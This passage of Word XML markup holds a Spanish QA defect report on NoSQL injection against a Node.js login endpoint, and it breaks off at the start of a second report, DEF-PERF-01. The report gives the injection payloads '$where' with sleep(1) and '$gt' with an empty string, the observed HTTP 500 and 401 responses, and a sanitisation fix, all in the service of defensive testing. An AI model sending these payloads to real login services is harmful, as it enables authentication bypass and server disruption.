          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardware y software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PC, 16GB RAM, Intel Core i5 · Node.js 20 · Jest v29 + Supertest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema operativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Navegador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resolución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1920x1080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Comentarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detectado en TC-SEC-02 — Seguridad OWASP A03 (Inyección NoSQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nombre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 500 ante operador $where — exposición de error interno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /auth/login con email: {"$where":"sleep(1)"} produce HTTP 500 Internal Server Error, exponiendo información de error interna. Además, email: {"$gt":""} ejecuta la query MongoDB sin validar que el campo sea de tipo string.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Encargado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Andrés Gustavo Arias Ruiz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Prioridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Backend corriendo.
2. Usuario victim@test.com registrado en BD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pasos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. POST /auth/login con body: {"email":{"$where":"sleep(1)"},"password":"x"}.
2. Verificar código HTTP.
3. POST /auth/login con body: {"email":{"$gt":""},"password":"x"}.
4. Verificar que retorna 400 (validación de tipo) no 401.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 400 o 401 sin exponer errores internos. email debe validarse como tipo string.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado obtenido</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Paso 1: HTTP 500 Internal Server Error (operador $where fuerza evaluación JS en MongoDB).
Paso 2: HTTP 401 (query ejecutada, no rechazada por tipo). Test [DEF-SEC-07] FALLA: expected not.toBe(500), received 500.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Notas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Causa raíz: Falta middleware express-mongo-sanitize y validación de tipo en routes/auth.js.
Correción: npm install express-mongo-sanitize; app.use(mongoSanitize()); y validar typeof email === "string" antes de User.findOne().</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C55A11" w:sz="6"/>
          <w:left w:val="single" w:color="C55A11" w:sz="6"/>
          <w:bottom w:val="single" w:color="C55A11" w:sz="6"/>
          <w:right w:val="single" w:color="C55A11" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="C55A11" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-PERF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-PERF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardware y software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
